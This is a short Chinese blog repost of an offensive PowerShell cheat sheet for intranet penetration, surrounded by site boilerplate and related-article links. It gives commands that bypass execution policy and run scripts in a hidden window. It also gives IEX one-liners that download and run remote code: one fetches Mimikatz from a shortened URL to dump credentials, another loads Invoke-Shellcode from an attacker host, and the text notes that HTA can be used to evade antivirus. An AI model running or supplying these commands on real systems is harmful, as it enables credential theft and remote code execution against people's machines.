PowerShell-白红宇

强烈建议你试试无所不能的chatGPT，快点击我

PowerShell

阅读量：6034 次

发布时间：2019-06-20

本文共 725 字，大约阅读时间需要 2 分钟。

摘自：《powershell内网***_light》

本地权限绕过

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隐藏权限绕过执行脚本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1

直接用IEX下载远程的PS1脚本回来权限绕过执行

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

内网***实例

远程代码执行：

IEX (New-Object Net.WebClient).DownloadString(“http://
     
      /path/xxx.ps1”)

目标主机‘安装’invoke-shellcode脚本

IEX (New-Object Net.WebClient).DownloadString("http://192.168.146.129/CodeExecution/Invoke--Shellcode.ps1")

查看帮助信息：

Get-Help Invoke-Shellcode

有一段时间了,忽然看见freebuf一篇文章很实用,通过hta来调用powershell(最大特点免杀),很受启发。（文章地址：）

转载于:https://blog.51cto.com/maxvision/1699591

你可能感兴趣的文章

JAVA多线程深度解析

Kafka High Level Consumer 会丢失消息

java 获取系统当前时间的方法

Ubuntu 10.04升级git 到1.7.2或更高的可行方法

Spring Security4实战与原理分析视频课程（扩展+自定义）

消息队列服务器 memcacheq的搭建

VMware Horizon View 7.5 虚拟桌面实施咨询与购买--软件硬件解决方案

RabbitMQ如何保证队列里的消息99.99%被消费？

第一周博客作业

String、StringBuffer和StringBuilder的区别

oracle recyclebin与flashback drop

svmlight使用说明

Swing 和AWT之间的关系

Mysql设置自增长主键的初始值

Android计时器正确应用方式解析

获取post传输参数

ASP生成静态页面的方法

喝酒易醉，品茶养心，人生如梦，品茶悟道，何以解忧？唯有杜康！-- 愿君每日到此一游！

当前时间: 2025-01-03 00:03:32 当前IP: 3.17.78.182 联系邮箱:javaeecc@qq.com Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2

强烈建议你试试无所不能的CHAT-GPT，快点击我

强烈建议你试试无所不能的CHAT-GPT，快点击我